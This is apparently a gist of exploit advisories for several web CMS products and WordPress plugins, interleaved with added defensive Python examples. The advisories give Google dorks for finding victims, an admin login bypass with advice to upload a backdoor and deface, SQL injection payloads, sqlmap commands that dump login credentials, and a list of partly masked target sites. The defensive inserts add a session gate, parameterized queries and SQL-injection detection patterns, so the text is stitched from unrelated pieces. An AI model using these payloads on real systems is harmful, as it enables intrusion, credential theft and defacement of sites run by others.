@dreadpiratesr
Created November 5, 2015 16:21
Exploit Title: Supercon Direct login to admin panel without entering password
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
Product Description
——————-
Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
We provide world-class technology services by constantly exploring and implementing innovative
solutions that drive long-term value to our customers. We have been providing solutions to clients
across the globe for more than 5 years and boast of our extensive
experience on website designing and development projects.
Vulnerability Details
———————
First type the dork [inurl:/webadmin/login.php intext:“Supercon Infoservices”]
Then find a site in which "Copyright © [Version] Supercon Infoservices(P) Ltd." is written in the footer
Now, go to its admin page http://www.targetsite.com/webadmin/login.php
After opening the admin panel, follow this link http://www.targetsite.com/webadmin/manage-gallery.php
And voila, you will be logged directly in to the admin panel, and you can also upload your backdoor and deface :) .
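The flaw above is one admin page whose session check was left out. As an added example (not Supercon's code and not from the gist), here is the deny-by-default gate a maintainer would put in front of the whole /webadmin/ directory so that a page that forgets its own check is still protected, together with a log triage heuristic that lists protected admin pages served to clients that never posted to the login page. The paths, the session key and the log line format are assumed.

```python
"""Deny-by-default gate for an admin directory, plus a log triage check.

Added example; not Supercon's code and not from the gist. The flaw described
above is one admin page (manage-gallery.php) that can be opened without a
session, i.e. a per-page check that was left out. A single gate in front of
the whole /webadmin/ directory protects pages that forget their own check.
Paths, the session key and the log line format are assumed.
"""
import posixpath
from urllib.parse import quote, urlsplit

ADMIN_PREFIX = "/webadmin/"
LOGIN_PATH = "/webadmin/login.php"
# Admin-area paths reachable without a session; everything else under
# ADMIN_PREFIX needs one.
PUBLIC_ADMIN_PATHS = frozenset({LOGIN_PATH})
SESSION_KEY = "admin_user"


def normalize_path(raw_url: str) -> str:
    """Collapse '.', '..' and repeated slashes so a request is judged by the
    page it actually reaches, e.g. '/webadmin/../webadmin//manage-gallery.php'
    is treated as '/webadmin/manage-gallery.php'. A trailing slash is kept so
    the directory index '/webadmin/' stays inside the admin area."""
    path = urlsplit(raw_url).path or "/"
    norm = "/" + posixpath.normpath(path).lstrip("/")
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def is_admin_path(path: str) -> bool:
    """'/webadmin' and everything below '/webadmin/' belong to the admin area."""
    return path == ADMIN_PREFIX.rstrip("/") or path.startswith(ADMIN_PREFIX)


def gate(raw_url: str, session: dict) -> tuple:
    """Decide a request: ('allow', None) or ('redirect', login_url)."""
    path = normalize_path(raw_url)
    if not is_admin_path(path):
        return "allow", None          # not an admin page; out of scope here
    if path in PUBLIC_ADMIN_PATHS or session.get(SESSION_KEY):
        return "allow", None
    # Deny by default: no session and not an allowlisted public page.
    return "redirect", LOGIN_PATH + "?next=" + quote(path)


def audit_access_log(lines) -> list:
    """Triage heuristic over constructed log lines of the form
    '<client> <method> <path> <status>': report 200 responses for protected
    admin pages from clients that never POSTed to the login page earlier in
    the log. A POST to login.php is only taken as a login attempt, so this
    yields candidates for review, not proof of a bypass."""
    seen_login = set()
    findings = []
    for line in lines:
        client, method, raw_url, status = line.split()
        path = normalize_path(raw_url)
        if path == LOGIN_PATH:
            if method == "POST":
                seen_login.add(client)
            continue
        protected = is_admin_path(path) and path not in PUBLIC_ADMIN_PATHS
        if protected and status == "200" and client not in seen_login:
            findings.append((client, path))
    return findings


# Constructed sample log: one client logs in first, another goes straight to
# protected pages, which is the pattern the advisory above describes.
SAMPLE_LOG = [
    "10.0.0.5 GET /webadmin/login.php 200",
    "10.0.0.5 POST /webadmin/login.php 302",
    "10.0.0.5 GET /webadmin/manage-gallery.php 200",
    "198.51.100.7 GET /webadmin/manage-gallery.php 200",
    "198.51.100.7 GET /webadmin/../webadmin//upload.php 200",
]

if __name__ == "__main__":
    for url in ("/webadmin/manage-gallery.php", "/webadmin/login.php", "/webadmin/"):
        print(url, "->", gate(url, {}))
    for client, path in audit_access_log(SAMPLE_LOG):
        print("review:", client, "reached", path, "without a prior login")
```

The gate normalizes the path before deciding, because a check that compares the raw request string can be walked around with `..` or doubled slashes while the web server still serves the same file.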
Exploit Title: Wordpress Better-wp-security Plugin Remote Code Execution
Google Dork : inurl:wp-content/plugins/better-wp-security
Location : http://site.com/wp-content/plugins/better-wp-security/better-wp-security.php
Vulnerability is also triggered in: http://site.com/wp-content/plugins/better-wp-security/core/class-itsec-core.php
    public function admin_tooltip_ajax() {
        global $itsec_globals;

        // The only gate before the dispatch below: a nonce check (CSRF protection, not authorization).
        if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( $_POST['nonce'] ), 'itsec_tooltip_nonce' ) ) {
            die();
        }

        if ( sanitize_text_field( $_POST['module'] ) == 'close' ) {
            // Persist the "tooltips dismissed" flag.
            $data = $itsec_globals['data'];
            $data['tooltips_dismissed'] = true;
            update_site_option( 'itsec_data', $data );
        } else {
            // The request-supplied module name is used as an array key without checking that it exists,
            // and whatever is found under ['callback'] is invoked with no arguments.
            call_user_func_array( $this->tooltip_modules[ sanitize_text_field( $_POST['module'] ) ]['callback'], array() );
        }

        die(); // this is required to return a proper result
    }
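For contrast with the snippet above, here is the hardened shape of such a handler as an added example in Python; it is neither the Better WP Security plugin's code nor WordPress's nonce implementation. In the PHP the only gate before `call_user_func_array()` is the nonce check, the `module` value is used as an array key without confirming the key exists, and no capability is checked. The version below verifies an HMAC nonce in constant time, requires a capability, and dispatches only to names in a fixed registry; the nonce scheme, module names and capability strings are assumed.

```python
"""Hardened shape for an AJAX handler that selects a callback by a
request-supplied name.

Added example; not the Better WP Security plugin's code and not WordPress's
nonce implementation. The nonce scheme, the registry contents and the
capability string are assumed.
"""
import hashlib
import hmac
import time

NONCE_SECRET = b"constructed-server-secret"   # real code reads this from config
NONCE_LIFETIME = 12 * 3600                    # seconds per nonce window


def make_nonce(action: str, user_id: int, now: float = None) -> str:
    """HMAC over action, user and time window. A nonce is a CSRF token: it
    proves the request came from a page this user loaded, nothing more."""
    now = time.time() if now is None else now
    tick = int(now // NONCE_LIFETIME)
    msg = f"{action}|{user_id}|{tick}".encode()
    return hmac.new(NONCE_SECRET, msg, hashlib.sha256).hexdigest()[:20]


def verify_nonce(nonce: str, action: str, user_id: int, now: float = None) -> bool:
    """Accept the current and the previous window; constant-time compare."""
    now = time.time() if now is None else now
    for offset in (0, NONCE_LIFETIME):
        if hmac.compare_digest(nonce, make_nonce(action, user_id, now - offset)):
            return True
    return False


def dismiss_tooltips() -> str:
    return "tooltips dismissed"


def show_backup_tooltip() -> str:
    return "backup tooltip"


# Fixed registry: the request chooses among these names and nothing else.
TOOLTIP_MODULES = {
    "close": {"callback": dismiss_tooltips},
    "backup": {"callback": show_backup_tooltip},
}


def admin_tooltip_ajax(post: dict, user: dict, now: float = None) -> tuple:
    """Return (http_status, body). `user` is an assumed dict with an 'id'
    and a set of 'caps'."""
    nonce = post.get("nonce", "")
    if not verify_nonce(nonce, "itsec_tooltip_nonce", user["id"], now):
        return 403, "bad nonce"
    # The nonce passed, so the request is not cross-site; the user still
    # has to be allowed to change settings.
    if "manage_options" not in user["caps"]:
        return 403, "insufficient capability"
    module = post.get("module", "")
    entry = TOOLTIP_MODULES.get(module)
    if entry is None:                 # unknown name: nothing is looked up or called
        return 400, "unknown module"
    return 200, entry["callback"]()


if __name__ == "__main__":
    admin = {"id": 1, "caps": {"manage_options"}}
    token = make_nonce("itsec_tooltip_nonce", admin["id"])
    print(admin_tooltip_ajax({"nonce": token, "module": "close"}, admin))
    print(admin_tooltip_ajax({"nonce": token, "module": "not_registered"}, admin))
```

The three checks are independent: a valid nonce says nothing about who the user is, the capability says nothing about which module is requested, and the registry lookup is what keeps the request from naming a callback the code never meant to expose.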
Exploit Title: Property Castle CMS post SQL injection
Google Dork: inurl:“/cms/cms.php?link_id=”
1- get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+
we will have the database name
2- we search for the “contact us” page
3- we use “http header” to get the data names (all POST data are injectable; I will use the first one in this example)
4- we use the sqlmap tool now and inject it with the POST method
EXAMPLE : [ sqlmap --url "http://website/user/controller/valuation/valuation-controller.php" --data "name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php" -p name -D [database_name] -T login -C username,password --dump ]
#admin page: http://website/admin/index.php
Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
Dork Google: inurl:/admin-ajax.php?action=go_view_object
######################
PoC via Browser:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
sqlmap:
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid
---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
#####################
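Both the Property Castle and the Gallery Objects entries above are the same defect, a request parameter pasted into SQL text. As an added example (not code from either product or from the gist), the block below shows the interpolated query beside its validated, parameterized replacement, and a triage filter that flags request-log lines carrying the payload shapes quoted in those two advisories. SQLite stands in for MySQL, so the MySQL-only updatexml() error technique is not reproduced, only the boolean-based `viewid=1 AND 1=2` pattern; the table, column and log-line format are assumed.

```python
"""Boolean-based SQL injection: the interpolated query beside the validated,
parameterized one, and a request-log check for the payload shapes quoted in
the advisories above.

Added example; not code from Property Castle, the Gallery Objects plugin or
the gist. Table, column and log-line formats are assumed.
"""
import re
import sqlite3
from urllib.parse import unquote_plus, urlsplit


def make_db():
    """In-memory stand-in for the plugin's table (constructed rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE gallery_objects (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO gallery_objects VALUES (?, ?)",
                    [(1, "lobby"), (2, "garden")])
    return con


def view_object_vulnerable(con, viewid: str) -> list:
    """The request value becomes part of the SQL text, so '1 AND 1=2'
    returns no rows while '1 AND 1=1' returns the row: that true/false
    difference is what the sqlmap output above is reading."""
    sql = "SELECT title FROM gallery_objects WHERE id=" + viewid
    return [row[0] for row in con.execute(sql)]


def view_object_fixed(con, viewid: str) -> list:
    """Validate the type first, then bind the value; no SQL is ever built
    from the request string."""
    if not re.fullmatch(r"[0-9]{1,10}", viewid):
        raise ValueError("viewid must be a positive integer")
    rows = con.execute("SELECT title FROM gallery_objects WHERE id=?", (int(viewid),))
    return [row[0] for row in rows]


def fixed_rejects(con, viewid: str) -> bool:
    """True when the hardened handler refuses the value."""
    try:
        view_object_fixed(con, viewid)
    except ValueError:
        return True
    return False


# Marker shapes taken from the payloads quoted in the advisories above,
# matched after URL-decoding. A triage filter for log review, not a WAF.
SQLI_MARKERS = re.compile(
    r"(?i)(updatexml\s*\(|extractvalue\s*\(|/\*!\d+"
    r"|\b(and|or)\s+\d+\s*=\s*\d+|'\s*(and|or)\b|--\s*$)"
)


def flag_sqli_requests(log_lines) -> list:
    """Return (client, decoded query string) for constructed log lines of the
    form '<client> <method> <url> <status>' whose query string matches."""
    hits = []
    for line in log_lines:
        client, _method, url, _status = line.split()
        query = unquote_plus(urlsplit(url).query)
        if SQLI_MARKERS.search(query):
            hits.append((client, query))
    return hits


# Constructed sample log: two lines reuse the payload shapes quoted above,
# two are ordinary requests.
SAMPLE_LOG = [
    "203.0.113.9 GET /cms/cms.php?link_id=4 200",
    "203.0.113.9 GET /cms/cms.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+ 500",
    "203.0.113.9 GET /wp-admin/admin-ajax.php?action=go_view_object&viewid=1+AND+1=2&type=html 200",
    "192.0.2.4 GET /wp-admin/admin-ajax.php?action=go_view_object&viewid=2&type=html 200",
]

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, '1 AND 1=1':", view_object_vulnerable(con, "1 AND 1=1"))
    print("vulnerable, '1 AND 1=2':", view_object_vulnerable(con, "1 AND 1=2"))
    print("fixed rejects '1 AND 1=2':", fixed_rejects(con, "1 AND 1=2"))
    for client, query in flag_sqli_requests(SAMPLE_LOG):
        print("review:", client, query)
```

The fixed handler does two things on purpose: the integer check gives a clear error for anything that is not an id, and the bound parameter means that even if validation were loosened later the value could never become SQL syntax. The log filter decodes the query string first, since the payloads above arrive percent-encoded and with `+` for spaces.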
Polish CMS - SQL Injection
{-} Vulnerable Versions => All Versions So Far.
{x} Google Dork:: 1 => inurl:index.php?op=galeria id= site:pl
{x} Google Dork:: 2 => inurl:new/index.php?op=galeria id= site:pl
——————————————————————————————————————————–
File:
index.php {HomePage}
Vulnerable Parameters:
[id] , [j] , [s] , [lang]
Administration Panel:
/admin/
Exploit Title: PRIVATE CSR
Google Dork : inurl:/“config/config.izo”
# Priv8 SCR Editors
#
#######################################################
# Use Editors To Edit Config Files And Deface The Site Via CSR Editors.
#######################################################
#
# [+] Example:
#http://lom-radioX.com/config/config.izo
#http://kesbangpolbuXlukumba.info/config/config.izo
#http://www.mirgosXtinits.ru/config/config.izo
#http://sacredodysXsey.com/config/config.izo
#http://www.biohXgienica.com/config/config.izo
#######################################################
# [+] Deface Page: www.site.com/config/tar.tmp
#######################################################